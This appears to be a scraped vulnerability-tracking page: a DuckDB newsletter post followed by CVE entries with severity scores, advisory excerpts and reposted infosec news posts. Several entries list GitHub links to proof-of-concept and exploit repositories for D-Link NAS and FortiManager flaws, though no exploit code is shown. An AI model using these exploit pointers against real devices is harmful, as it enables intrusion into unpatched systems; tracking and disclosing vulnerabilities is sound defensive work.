### Impact The vulnerability may allow a remote attacker to terminate the application with a stack overflow error resulting in a denial of service only by manipulating the processed input stream when XStream is configured to use the BinaryStreamDriver. ### Patches XStream 1.4.21 detects the manipulation in the binary input stream causing the the stack overflow and raises an InputManipulationExcep

dailydrop.hrbrmstr.dev@dailydrop.hrbrmstr.dev at 2024-11-09T14:11:00.000Z ##

Quacking In The [g]Sheets; My🦆Server; Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)

My day outside of Reno started early, Friday, and we were chased by black helicopters (not joking), so — as expected — no Friday normal Drop.

But things are QUACKING in DuckDB land, and I just had to get a Bonus 🦆 Drop out about them before more hiking this weekend.

Subscribe

TL;DR

(This is an AI-generated summary of today’s Drop using Ollama + llama 3.2 and a custom Modelfile.)

  • DuckDB GSheets extension enables direct integration with Google Sheets for reading and writing data through SQL, featuring OAuth authentication and basic query syntax (https://duckdb-gsheets.com/)
  • MyDuck Server bridges MySQL and DuckDB by providing MySQL-compatible interface while storing data in DuckDB’s OLAP format, offering significant performance improvements (https://github.com/apecloud/myduckserver)
  • DuckDB HTTP Client extension allows direct HTTP GET/POST requests within DuckDB queries, enabling integration with web APIs and immediate processing of response data (https://github.com/quackscience/duckdb-extension-httpclient)

Quacking In The [g]Sheets

The DuckDB GSheets extension (GH) enables seamless integration between DuckDB’s analytical capabilities and Google Sheets, bridging a critical gap between collaborative spreadsheet workflows and robust data analysis.

The extension provides straightforward (though fairly basic, for now) SQL syntax for both reading and writing Google Sheets data. You can query sheets using either full URLs or spreadsheet IDs, with options to specify sheet names and handle header rows. Authentication can be handled through browser-based OAuth or via Google API access tokens.

If you work in an environment where domain experts collaborate with datascience/analysis teams, Google Sheets (et al.) often serves as an accessible interface for non-technical team members to maintain and update data that feeds into analytical workflows. For example, product managers can maintain feature flags, marketing teams can update campaign metadata, and operations teams can manage configuration data – all through the familiar spreadsheet interface rather than dealing with JSON, YAML, or raw text files.

Setting up the extension requires installing it from the community repository (you need to be on a fairly recent release of DuckDb for this to work):

INSTALL gsheets FROM community;LOAD gsheets;

Basic usage patterns include:

-- Read from a sheetFROM read_gsheet('spreadsheet_url_or_id');-- Write to a sheetCOPY table_name TO 'spreadsheet_url_or_id' (FORMAT gsheet);

The section header image is from this gsheet which is (my public copy of) a “Database of network device CVEs” provided by Sophos from a five-year massively cool (but evil) hack of dozens of corporations around the globe. It is possible this sheet might be updated regularly, especially the “GreyNoise (#of Malicious IPs Scanning)” column (that’s my $WORK place). If that is the case it may make more sense to access it directly than to have some process to download it somewhere regularly.

I made a perma-copy of my OAuth’d access token:

LOAD gsheets;CREATE PERSISTENT SECRET (  TYPE gsheet,   PROVIDER access_token,   TOKEN 'yOUrToK3nH3re');

And, now we can look at the “schema”:

$ duckdb -json -c "  LOAD gsheets;   FROM read_gsheet(    'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550',     sheet = 'Sheet1'  )   LIMIT 1" | jq[  {    "Vendor": "Sophos",    "Title": "Sophos SFOS SQL Injection Vulnerability",    "CVE": "CVE-2020-12271",    "CVSS": 9.8,    "Date of NVD publication": "4/27/20",    "Date of vendor advisory": "Unknown",    "Used in ransomware attacks?": "Known",    "Summary": "Sophos Firewall operating system (SFOS) firmware contains a SQL injection vulnerability when configured with either the administration (HTTPS) service or the User Portal is exposed on the WAN zone. Successful exploitation may cause remote code execution to exfiltrate usernames and hashed passwords for the local device admin(s), portal admins, and user accounts used for remote access (but not external Active Directory or LDAP passwords).",    "Date added to KEV Catalog": "11/3/21",    "Vendor Advisory": "https://community.sophos.com/kb/en-us/135412",    "Date of Known Exploitation": "Apr-20",    "Threat actor": "Unknown",    "Targets": "Telecommunication,Construction,Transportation,Education,Manufacturing,Auto,Airline,Pharmaceuticals,Retail,Insurance,Legal",    "Metasploit Module": "N",    "GreyNoise (#of Malicious IPs Scanning)": 0.0,    "Number of vulnerable devices": "?",    "Number of impacted devices": "?",    "GreyNoise Link": "https://viz.greynoise.io/query/%0A%20%20CVE-2020-12271"  }]

And, perform normal ops on it:

$ duckdb -table -c "LOAD gsheets;FROM read_gsheet(  'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550',  sheet='Sheet1')SELECT  Vendor,  COUNT(Vendor) AS ctGROUP BY  VendorORDER BY  2 DESC"+---------------------+----+|       Vendor        | ct |+---------------------+----+| Cisco               | 72 || D-Link              | 19 || Ivanti              | 18 || Citrix              | 16 || Fortinet            | 13 || SonicWall           | 10 || Zyxel               | 9  || NETGEAR             | 8  || Juniper             | 6  || F5                  | 6  || PANW                | 5  || Sophos              | 5  || DrayTek             | 3  || Tenda               | 3  || TP-Link             | 2  || MikroTik            | 2  || Dasan               | 2  || Check Point         | 1  || D-Link and TRENDnet | 1  || Barracuda           | 1  || Netis               | 1  || FatPipe             | 1  || Arcadyan            | 1  || Sumavision          | 1  |+---------------------+----+

The extension has some notable constraints to consider:

  • Google Sheets’ 1M cell limit per spreadsheet
  • Data must start in cell A1
  • Sheets must exist before writing to them

These limitations aside, the DuckDB GSheets extension will will (eventually) provide a robust bridge between collaborative data maintenance and analytical processing, making it easier for organizations to maintain their data workflows across technical and non-technical team members.

The code is very readable, but the extension is also a tad buggy at the moment (you may not always be able to get to a particular sheet, I have not debugged why, yet); so, this might be a good project to PR into if you have some specific functionality you need, but is presently missing, like support for a subset of the bonkers number of parameters you can use when reading CSV files in DuckDB.

My🦆Server

MyDuck Server is a nascent bridge between MySQL and DuckDB with a goal of enabling high-performance analytics while maintaining MySQL compatibility. It functions by storing data in DuckDB’s OLAP-optimized format while presenting a MySQL-compatible interface, allowing queries to execute [up to 1,000x] faster than traditional MySQL configurations.

The system operates through dual interfaces — a MySQL wire protocol on port 13306 (for traditional MySQL-style queries) and a PostgreSQL-compatible interface on port 15432. (for direct DuckDB SQL execution).

I’m including this mostly for visibility, since I do not run MySQL/MariaDB, and the README — while a tad verbose — is also not super helpful in terms of real examples.

If you are a MySQL/MariaDB shop, this might be something to keep on the radar.

Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)

Photo by Samson Andreea on Pexels.com

The DuckDB HTTP Client extension enables direct HTTP GET and POST requests from within DuckDB queries. After installing and loading via the community extensions repository, you can make HTTP requests that return results directly into DuckDB’s query processing pipeline.

By now, you should know how to install/load extensions:

INSTALL http_client FROM community;LOAD http_client;

The extension provides two main functions: http_get() for GET requests and http_post() for POST requests with optional headers and parameters. The results are returned as structured data that can be further processed using DuckDB’s SQL capabilities.

The extension returns responses in a consistent format that includes:

  • HTTP status code
  • Response reason
  • Response body (typically JSON)
  • Response headers

The response data can be immediately parsed and transformed using DuckDB’s built-in JSON processing capabilities and integrated into larger analytical queries.

The README provides a practical example of this extension’s utility is its ability to interact with spatial data APIs. When combined with DuckDB’s spatial extension, you can fetch GeoJSON data via HTTP and directly process it as geometric objects. This enables seamless integration of remote spatial data sources into DuckDB analytical workflows.

We can show another one, though. Let’s say we want to use DuckDB to analyze a day’s worth of NVD CVE records.

We can grab all of the CVEs for one day and save a temp copy in memory as a table (this reduces the number of times we need to fetch from the API):

CREATE TABLE yesterday AS (WITH   __req AS (    SELECT      http_get(        'https://services.nvd.nist.gov/rest/json/cves/2.0/?pubStartDate=2024-11-08T00:00:00.000&pubEndDate=2024-11-08T23:59:59.000'      ) AS res  ),  __res AS (    SELECT      UNNEST( from_json(((res->>'body')::JSON)->'vulnerabilities', '["json"]') )      AS cves    FROM      __req  ) FROM __res);

We’ll look at that in a second, but be aware that some APIs paginate (NVD does at 2,000 records) and this extension won’t handle that, but you can work around it if you combine this method with some shell scripting.

What that query returns is an array of deeply nexted JSON records:

FROM yesterday LIMIT 3;┌──────────────────────────────────────────────────────────────────────────────┐│                                     cves                                     ││                                     json                                     │├──────────────────────────────────────────────────────────────────────────────┤│ {"cve":{"id":"CVE-2024-47072","sourceIdentifier":"security-advisories@gith…  ││ {"cve":{"id":"CVE-2024-51987","sourceIdentifier":"security-advisories@gith…  ││ {"cve":{"id":"CVE-2024-51998","sourceIdentifier":"security-advisories@gith…  │└──────────────────────────────────────────────────────────────────────────────┘

But DuckDB let’s us work with JSON pretty seamlessly.

It looks like the NVD contractors are milking their contract for all its worth:

FROM yesterdaySELECT   cves->>'cve'->>'vulnStatus' AS vulnStatus,  COUNT() AS ct,  ROUND(COUNT() * 100.0 / SUM(COUNT()) OVER (), 2) AS pctGROUP BY ALL;┌─────────────────────┬───────┬────────┐│     vulnStatus      │  ct   │  pct   ││       varchar       │ int64 │ double │├─────────────────────┼───────┼────────┤│ Awaiting Analysis   │    83 │  65.87 ││ Received            │    34 │  26.98 ││ Undergoing Analysis │     9 │   7.14 │└─────────────────────┴───────┴────────┘

You can add headers, and use getenv(var) to fill in things like API keys.

This is a super fun extension to play with!

FIN

Remember, you can follow and interact with the full text of The Daily Drop’s free posts on Mastodon via @dailydrop.hrbrmstr.dev@dailydrop.hrbrmstr.dev ☮️

https://dailydrop.hrbrmstr.dev/2024/11/09/bonus-drop-67-2024-11-09-if-it-%f0%9f%9a%81-like-a-%f0%9f%a6%86/

#duckdb

##

CVE-2024-50340
(7.3 HIGH)

EPSS: 0.05%

updated 2024-11-06T23:39:52

1 posts

### Description When the `register_argc_argv` php directive is set to `on` , and users call any URL with a special crafted query string, they are able to change the environment or debug mode used by the kernel when handling the request. ### Resolution The `SymfonyRuntime` now ignores the `argv` values for non-cli SAPIs PHP runtimes The patch for this issue is available [here](https://github.co

Nuclei template

1 repos

#search_error

alex@bouma.social at 2024-11-19T10:50:25.000Z ##

@valorin I found this one a pretty good summary: blog.nollium.com/cve-2024-5034 although I believe Laravel applications were only impacted for the application environment name (production/staging etc.) and the debug flag was Symfony specific.

##

CVE-2024-20484
(7.5 HIGH)

EPSS: 0.04%

updated 2024-11-06T18:31:17

1 posts

A vulnerability in the External Agent Assignment Service (EAAS) feature of Cisco Enterprise Chat and Email (ECE) could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to insufficient validation of Media Routing Peripheral Interface Manager (MR PIM) traffic that is received by an affected device. An attacker co

1 repos

#search_error

oversecurity@mastodon.social at 2024-11-18T11:50:04.000Z ##

CERT-In Flags Two High-Risk Cisco Vulnerabilities Targeting Key Infrastructure

CERT-In has added two high-severity Cisco vulnerabilities (CVE-2024-20484 & CVE-2024-20536) to its catalog, which impact Nexus Dashboard Fabric...

🔗️ [Cyble] link.is.it/e4pce7

##

CVE-2024-20536
(8.8 HIGH)

EPSS: 0.04%

updated 2024-11-06T18:31:17

1 posts

A vulnerability in a REST API endpoint and web-based management interface of Cisco Nexus Dashboard Fabric Controller (NDFC) could allow an authenticated, remote attacker with read-only privileges to execute arbitrary SQL commands on an affected device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted req

oversecurity@mastodon.social at 2024-11-18T11:50:04.000Z ##

CERT-In Flags Two High-Risk Cisco Vulnerabilities Targeting Key Infrastructure

CERT-In has added two high-severity Cisco vulnerabilities (CVE-2024-20484 & CVE-2024-20536) to its catalog, which impact Nexus Dashboard Fabric...

🔗️ [Cyble] link.is.it/e4pce7

##

CVE-2024-10826
(8.8 HIGH)

EPSS: 0.04%

updated 2024-11-06T18:31:17

1 posts

Use after free in Family Experiences in Google Chrome on Android prior to 130.0.6723.116 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

screaminggoat@infosec.exchange at 2024-11-07T21:45:13.000Z ##

Microsoft security advisory: Release notes for Microsoft Edge Security Updates
This isn't showing the latest Microsoft Edge version which is 130.0.2849.80, but two security advisories indicate that the newest version addresses both Chromium vulnerabilities CVE-2024-10826 and CVE-2024-10827. These were originally announced by Google on Tuesday 05 November 2024

#microsoft #edge #chrome #chromium #vulnerability #CVE

##

CVE-2024-10827
(8.8 HIGH)

EPSS: 0.04%

updated 2024-11-06T18:31:17

1 posts

Use after free in Serial in Google Chrome prior to 130.0.6723.116 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

screaminggoat@infosec.exchange at 2024-11-07T21:45:13.000Z ##

Microsoft security advisory: Release notes for Microsoft Edge Security Updates
This isn't showing the latest Microsoft Edge version which is 130.0.2849.80, but two security advisories indicate that the newest version addresses both Chromium vulnerabilities CVE-2024-10826 and CVE-2024-10827. These were originally announced by Google on Tuesday 05 November 2024

#microsoft #edge #chrome #chromium #vulnerability #CVE

##

CVE-2024-42509
(9.8 CRITICAL)

EPSS: 0.04%

updated 2024-11-06T18:17:17.287000

3 posts

Command injection vulnerability in the underlying CLI service could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's Access Point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.

rhudaur@flipboard.com at 2024-11-12T21:44:53.000Z ##

HPE Issues Urgent Patches for Critical Vulnerabilities in Aruba Networking Access Points
thecyberexpress.com/hpe-securi

Posted into Cybersecurity Today @cybersecurity-today-rhudaur

##

jos1264@social.skynetcloud.site at 2024-11-12T11:35:03.000Z ##

HPE Issues Urgent Patches for Critical Vulnerabilities in Aruba Networking Access Points thecyberexpress.com/hpe-securi #ArubaNetworkingAccessPoint #SecurityVulnerabilities #TheCyberExpressNews #Vulnerabilities #TheCyberExpress #FirewallDaily #CVE202442509 #CVE202447460 #CyberNews #AOS10 #AOS8

##

jbhall56@infosec.exchange at 2024-11-08T13:17:14.000Z ##

The critical security defects, tracked as CVE-2024-42509 (CVSS score of 9.8) and CVE-2024-47460 (CVSS score of 9.0), impact Aruba’s access point management protocol’s underlying CLI service. securityweek.com/hpe-patches-c

##

CVE-2024-47460
(9.0 CRITICAL)

EPSS: 0.04%

updated 2024-11-06T18:17:17.287000

1 posts

Command injection vulnerability in the underlying CLI service could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's Access Point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.

jbhall56@infosec.exchange at 2024-11-08T13:17:14.000Z ##

The critical security defects, tracked as CVE-2024-42509 (CVSS score of 9.8) and CVE-2024-47460 (CVSS score of 9.0), impact Aruba’s access point management protocol’s underlying CLI service. securityweek.com/hpe-patches-c

##

CVE-2024-20418
(10.0 CRITICAL)

EPSS: 0.04%

updated 2024-11-06T18:17:17.287000

1 posts

A vulnerability in the web-based management interface of Cisco Unified Industrial Wireless Software for Cisco Ultra-Reliable Wireless Backhaul (URWB) Access Points could allow an unauthenticated, remote attacker to perform command injection attacks with root privileges on the underlying operating system. This vulnerability is due to improper validation of input to the web-based management inter

jos1264@social.skynetcloud.site at 2024-11-08T01:30:02.000Z ##

Cisco URWB Access Point Command Injection Vulnerability (CVE-2024-20418) fortiguard.fortinet.com/threat

##

CVE-2024-10914
(8.1 HIGH)

EPSS: 16.93%

updated 2024-11-06T15:30:46

6 posts

A vulnerability was found in D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L up to 20241028. It has been declared as critical. Affected by this vulnerability is the function cgi_user_add of the file /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. The manipulation of the argument name leads to os command injection. The attack can be launched remotely. The complexity of an attack is rather high. The expl

Nuclei template

5 repos

https://github.com/verylazytech/CVE-2024-10914

https://github.com/ThemeHackers/CVE-2024-10914

https://github.com/imnotcha0s/CVE-2024-10914

https://github.com/Bu0uCat/D-Link-NAS-CVE-2024-10914-

https://github.com/Egi08/CVE-2024-10914

NosirrahSec at 2024-11-15T18:49:48.710Z ##

youtu.be/-vpGswuYVg8

Wow, this is just disgusting. I have no words for this level of malfeasance.

##

decio at 2024-11-13T12:32:14.803Z ##

🚨⚠️ Si vous possédez un NAS D-Link de la gamme ShareCenter, il est temps d'agir: ces appareils sont affectés par une vulnérabilité critique de type "Command Injection" qui permet très facilement aux malintentionnées de prendre le contrôle des dispositifs exposés sur Internet.

D-Link ne propose pas de correctif pour cette faille (modèles considérés en EOL - fin de support par la marque).

Modèles affectés :

  • DNS-320 Version 1.00
  • DNS-320LW Version 1.01.0914.2012
  • DNS-325 Version 1.01, Version 1.02
  • DNS-340L Version 1.08

Actions conseillés :

  • Retirez l'accès Internet à votre NAS D-Link.
  • Limitez l'accès réseau à des adresses IP spécifiques, de confiance seulement.

[Informations techniques]
⬇️
"Command Injection Vulnerability in name parameter for D-Link NAS"
👇
netsecfish.notion.site/Command

[Infosec news]
⬇️
"D-Link won’t fix critical flaw affecting 60,000 older NAS devices"
👇
bleepingcomputer.com/news/secu

(Selon Onyphe globalement plus de 5 214 NAS ShareCenter seraient exposés sur Internet
dont 358 appareils actuellement détectés en ligne en )

##

NosirrahSec@infosec.exchange at 2024-11-15T18:49:48.000Z ##

youtu.be/-vpGswuYVg8

Wow, this is just disgusting. I have no words for this level of malfeasance.

#CVE_2024_10914

##

decio@infosec.exchange at 2024-11-13T12:32:14.000Z ##

🚨⚠️ Si vous possédez un NAS D-Link de la gamme ShareCenter, il est temps d'agir: ces appareils sont affectés par une vulnérabilité critique de type "Command Injection" qui permet très facilement aux malintentionnées de prendre le contrôle des dispositifs exposés sur Internet.

D-Link ne propose pas de correctif pour cette faille (modèles considérés en EOL - fin de support par la marque).

Modèles affectés :

  • DNS-320 Version 1.00
  • DNS-320LW Version 1.01.0914.2012
  • DNS-325 Version 1.01, Version 1.02
  • DNS-340L Version 1.08

Actions conseillés :

  • Retirez l'accès Internet à votre NAS D-Link.
  • Limitez l'accès réseau à des adresses IP spécifiques, de confiance seulement.

[Informations techniques]
⬇️
"Command Injection Vulnerability in name parameter for D-Link NAS"
👇
netsecfish.notion.site/Command

[Infosec news]
⬇️
"D-Link won’t fix critical flaw affecting 60,000 older NAS devices"
👇
bleepingcomputer.com/news/secu

(Selon Onyphe globalement plus de 5 214 NAS ShareCenter seraient exposés sur Internet
dont 358 appareils actuellement détectés en ligne en #France )

#CyberVeille #Dlink #ShareCenter #CVE_2024_10914

##

jbhall56@infosec.exchange at 2024-11-11T13:10:40.000Z ##

The issue, tracked as CVE-2024-10914 (CVSS score of 9.2), impacts the account management functionality of the affected devices. securityweek.com/many-legacy-d

##

DarkWebInformer@infosec.exchange at 2024-11-11T02:15:12.000Z ##

🚨POC - CVE-2024–10914- Command Injection Vulnerability in `name` parameter for D-Link NAS

darkwebinformer.com/poc-cve-20

##

CVE-2024-49767
(7.5 HIGH)

EPSS: 0.06%

updated 2024-11-05T21:35:24

1 posts

Applications using Werkzeug to parse `multipart/form-data` requests are vulnerable to resource exhaustion. A specially crafted form body can bypass the `Request.max_form_memory_size` setting. The `Request.max_content_length` setting, as well as resource limits provided by deployment software and platforms, are also available to limit the resources used during a request. This vulnerability does no

1 repos

#search_error

mmguero@infosec.exchange at 2024-11-18T19:21:17.000Z ##

Malcolm v24.11.0 contains a new threat intelligence feed integration, a few new API calls, other minor improvements, bug fixes, and component version updates.

Malcolm is a powerful, easily deployable network traffic analysis tool suite for network security monitoring.

Malcolm operates as a cluster of containers 📦, isolated sandboxes which each serve a dedicated function of the system. This makes Malcolm deployable with frameworks like Docker, Podman, and Kubernetes. Check out the Quick Start guide for examples on how to get up and running.

Alternatively, dedicated official ISO installer images 💿 for Malcolm and Hedgehog Linux can be downloaded from Malcolm's releases page on GitHub. Due to limits on individual files in GitHub releases, these ISO files have been split 🪓 into 2GB chunks and can be reassembled with scripts provided for both Bash 🐧 (release_cleaver.sh) and PowerShell 🪟 (release_cleaver.ps1). See Downloading Malcolm - Installer ISOs for instructions.

As always, join us on the Malcolm discussions board 💬 to engage with the community, or pop some corn 🍿 and watch a video 📼.

v24.10.1...v24.11.0

#Malcolm #HedgehogLinux #Zeek #Arkime #NetBox #OpenSearch #Elasticsearch #Suricata #PCAP #NetworkTrafficAnalysis #networksecuritymonitoring #OT #ICS #icssecurity #CyberSecurity #Cyber #Infosec #INL #DHS #CISA #CISAgov

##

CVE-2024-8934
(6.5 MEDIUM)

EPSS: 0.04%

updated 2024-10-31T15:31:04

1 posts

A local user with administrative access rights can enter specialy crafted values for settings at the user interface (UI) of the TwinCAT Package Manager which then causes arbitrary OS commands to be executed.

CVE-2024-44252
(7.1 HIGH)

EPSS: 0.04%

updated 2024-10-30T18:30:48

1 posts

A logic issue was addressed with improved file handling. This issue is fixed in iOS 18.1 and iPadOS 18.1, iOS 17.7.1 and iPadOS 17.7.1, visionOS 2.1, tvOS 18.1. Restoring a maliciously crafted backup file may lead to modification of protected system files.

1 repos

#search_error

CVE-2024-38821
(9.1 CRITICAL)

EPSS: 0.04%

updated 2024-10-28T17:59:30

1 posts

Spring WebFlux applications that have Spring Security authorization rules on static resources can be bypassed under certain circumstances. For this to impact an application, all of the following must be true: * It must be a WebFlux application * It must be using Spring's static resources support * It must have a non-permitAll authorization rule applied to the static resources support

1 repos

#search_error

AAKL@infosec.exchange at 2024-11-19T14:55:39.000Z ##

Broadcom has a new security advisory for critical vulnerability CVE-2024-38821, OPS/MVS Event Management & Automation support.broadcom.com/web/ecx/s #cybersecurity #infosec

##

CVE-2024-49766(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-10-26T03:47:04

1 posts

On Python < 3.11 on Windows, `os.path.isabs()` does not catch UNC paths like `//server/share`. Werkzeug's `safe_join()` relies on this check, and so can produce a path that is not safe, potentially allowing unintended access to data. Applications using Python >= 3.11, or not using Windows, are not vulnerable.

1 repos

#search_error

mmguero@infosec.exchange at 2024-11-18T19:21:17.000Z ##

Malcolm v24.11.0 contains a new threat intelligence feed integration, a few new API calls, other minor improvements, bug fixes, and component version updates.

Malcolm is a powerful, easily deployable network traffic analysis tool suite for network security monitoring.

Malcolm operates as a cluster of containers 📦, isolated sandboxes which each serve a dedicated function of the system. This makes Malcolm deployable with frameworks like Docker, Podman, and Kubernetes. Check out the Quick Start guide for examples on how to get up and running.

Alternatively, dedicated official ISO installer images 💿 for Malcolm and Hedgehog Linux can be downloaded from Malcolm's releases page on GitHub. Due to limits on individual files in GitHub releases, these ISO files have been split 🪓 into 2GB chunks and can be reassembled with scripts provided for both Bash 🐧 (release_cleaver.sh) and PowerShell 🪟 (release_cleaver.ps1). See Downloading Malcolm - Installer ISOs for instructions.

As always, join us on the Malcolm discussions board 💬 to engage with the community, or pop some corn 🍿 and watch a video 📼.

v24.10.1...v24.11.0

#Malcolm #HedgehogLinux #Zeek #Arkime #NetBox #OpenSearch #Elasticsearch #Suricata #PCAP #NetworkTrafficAnalysis #networksecuritymonitoring #OT #ICS #icssecurity #CyberSecurity #Cyber #Infosec #INL #DHS #CISA #CISAgov

##

CVE-2024-47575
(9.8 CRITICAL)

EPSS: 5.18%

updated 2024-10-23T15:31:52

9 posts

A missing authentication for critical function in FortiManager 7.6.0, FortiManager 7.4.0 through 7.4.4, FortiManager 7.2.0 through 7.2.7, FortiManager 7.0.0 through 7.0.12, FortiManager 6.4.0 through 6.4.14, FortiManager 6.2.0 through 6.2.12, Fortinet FortiManager Cloud 7.4.1 through 7.4.4, FortiManager Cloud 7.2.1 through 7.2.7, FortiManager Cloud 7.0.1 through 7.0.13, FortiManager Cloud 6.4.1 th

8 repos

https://github.com/HazeLook/CVE-2024-47575

https://github.com/skyalliance/exploit-cve-2024-47575

https://github.com/expl0itsecurity/CVE-2024-47575

https://github.com/groshi/CVE-2024-47575-POC

https://github.com/krmxd/CVE-2024-47575

https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575

https://github.com/maybelookis/CVE-2024-47575

https://github.com/hazesecurity/CVE-2024-47575

threatcodex at 2024-11-16T18:05:05.477Z ##

Hop-Skip-FortiJump-FortiJump-Higher - Fortinet FortiManager CVE-2024-47575

labs.watchtowr.com/hop-skip-fo

##

screaminggoat at 2024-11-14T16:47:12.554Z ##

watchTowr: Hop-Skip-FortiJump-FortiJump-Higher - Fortinet FortiManager CVE-2024-47575
Reference: CVE-2024-47575 (9.8 critical, disclosed 23 October 2024 by Fortinet, noted earlier on 13 October by @GossiTheDog on Mastodon, added to CISA KEV Catalog 23 October, reported by Mandiant to be since June) Fortinet FortiManager Missing Authentication Vulnerability

watchTowr is disclosing a separate and unidentified privilege escalation vulnerability linked to CVE-2024-47575 due to the original vulnerability currently being under mass exploitation. They also warn that the published IoC, while helpful, may not cover all attacks: an unregistered device being added to the system, could be easily bypassed, and exploitation could occur without generating any log noise at all.

  • This implies that Fortinet have simply patched the wrong code, in the wrong file, in an entirely different library.
  • While we generally try to resist speculation on the internals of vendor’s development teams, it is very alarming that Fortinet appears to have botched this patch so badly (in our opinion). They have (in our opinion), in essence, patched the wrong code, leaving device administrators with a false sense of security.

##

screaminggoat@infosec.exchange at 2024-11-14T16:47:12.000Z ##

watchTowr: Hop-Skip-FortiJump-FortiJump-Higher - Fortinet FortiManager CVE-2024-47575
Reference: CVE-2024-47575 (9.8 critical, disclosed 23 October 2024 by Fortinet, noted earlier on 13 October by @GossiTheDog on Mastodon, added to CISA KEV Catalog 23 October, reported by Mandiant to be #eitw since June) Fortinet FortiManager Missing Authentication Vulnerability

watchTowr is disclosing a separate and unidentified privilege escalation vulnerability linked to CVE-2024-47575 due to the original #FortiJump vulnerability currently being under mass exploitation. They also warn that the published IoC, while helpful, may not cover all attacks: an unregistered device being added to the system, could be easily bypassed, and exploitation could occur without generating any log noise at all.

  • This implies that Fortinet have simply patched the wrong code, in the wrong file, in an entirely different library.
  • While we generally try to resist speculation on the internals of vendor’s development teams, it is very alarming that Fortinet appears to have botched this patch so badly (in our opinion). They have (in our opinion), in essence, patched the wrong code, leaving device administrators with a false sense of security.

#CVE_2024_47575 #vulnerability #fortinet #CVE #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI

##

inw@mastodon.social at 2024-11-20T16:57:35.000Z ##

What a wonderful writeup of the #fortinet vulnerabilities found by watchtowr labs. It's insightful and entertaining :) #cybersecurity #security #infosec

labs.watchtowr.com/hop-skip-fo

##

jkmcnk@mastodon.social at 2024-11-14T22:59:38.000Z ##

lol, at this point you should just throw your fortinet devices into a landfill. labs.watchtowr.com/hop-skip-fo

##

GossiTheDog@cyberplace.social at 2024-11-14T22:30:31.000Z ##

FortiJump Higher details are out. Even with the patch installed, apparently you can get RCE on FortiManager using a FortiGate it manages. labs.watchtowr.com/hop-skip-fo

##

AAKL@infosec.exchange at 2024-11-14T16:57:29.000Z ##

WatchTowr: Hop-Skip-FortiJump-FortiJump-Higher - Fortinet FortiManager CVE-2024-47575 labs.watchtowr.com/hop-skip-fo #cybersecurity #infosec #Fortinet

##

catc0n@infosec.exchange at 2024-11-13T21:00:29.000Z ##

Full Rapid7 analysis and #exploit PoC (with root shell!) for #FortiManager #CVE202447575 via @stephenfewer 🐚 Not a simple project, as it turned out :) attackerkb.com/topics/OFBGprmp

##

screaminggoat@infosec.exchange at 2024-11-13T20:05:14.000Z ##

@wdormann I think you have that confused. CVE-2024-47575 was published on 23 October 2024: infosec.exchange/@screaminggoa

##

CVE-2024-21216
(9.8 CRITICAL)

EPSS: 0.15%

updated 2024-10-17T15:31:09

2 posts

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVS

1 repos

#search_error

CVE-2024-4131
(7.8 HIGH)

EPSS: 0.04%

updated 2024-10-11T18:32:57

1 posts

A DLL hijack vulnerability was reported in Lenovo Emulator that could allow a local attacker to execute code with elevated privileges.

1 repos

https://github.com/Amal264882/CVE-2024-41312.

admin@mast.hpc.social at 2024-11-20T18:58:00.000Z ##

From the OpenHPC Community project:

Please join the OpenHPC Community BoF at #SC24 in B306 12:15-1:15pm Thur. 21 Nov 2024 for latest details and if you have any questions or suggestions. Members and contributors will also discuss adding Warewulf4 support Wed. 20 Nov 2:30-3:00 PM at CIQ Booth #cve_2024_4131

Look for further information from bsky.app/profile/openhpc.bsky. once they start posting!

##

CVE-2024-43601
(7.1 HIGH)

EPSS: 0.05%

updated 2024-10-08T18:33:29

1 posts

Visual Studio Code for Linux Remote Code Execution Vulnerability

1 repos

#search_error

screaminggoat@infosec.exchange at 2024-11-08T22:25:06.000Z ##

Microsoft Security Response Center (MSRC) updated the CVSSv3.1 vector string for CVE-2024-43601 Visual Studio Code for Linux Remote Code Execution Vulnerability today:

  • old value: AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H
  • new value: AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

The previous CVSSv3.1 score was presumably a 7.5 high, and now it's 7.8 base. How they decided that it was a local vector with low attack complexity and no privileges required is beyond me.

#msrc #microsoft #cve_2024_43601 #vulnerability #cve

##

CVE-2024-38813
(7.5 HIGH)

EPSS: 0.09%

updated 2024-10-02T15:31:39

19 posts

The vCenter Server contains a privilege escalation vulnerability. A malicious actor with network access to vCenter Server may trigger this vulnerability to escalate privileges to root by sending a specially crafted network packet.

jos1264@social.skynetcloud.site at 2024-11-18T19:30:03.000Z ##

VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw securityweek.com/vmware-disclo #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware

##

jos1264@social.skynetcloud.site at 2024-11-18T19:30:03.000Z ##

VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw securityweek.com/vmware-disclo #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware

##

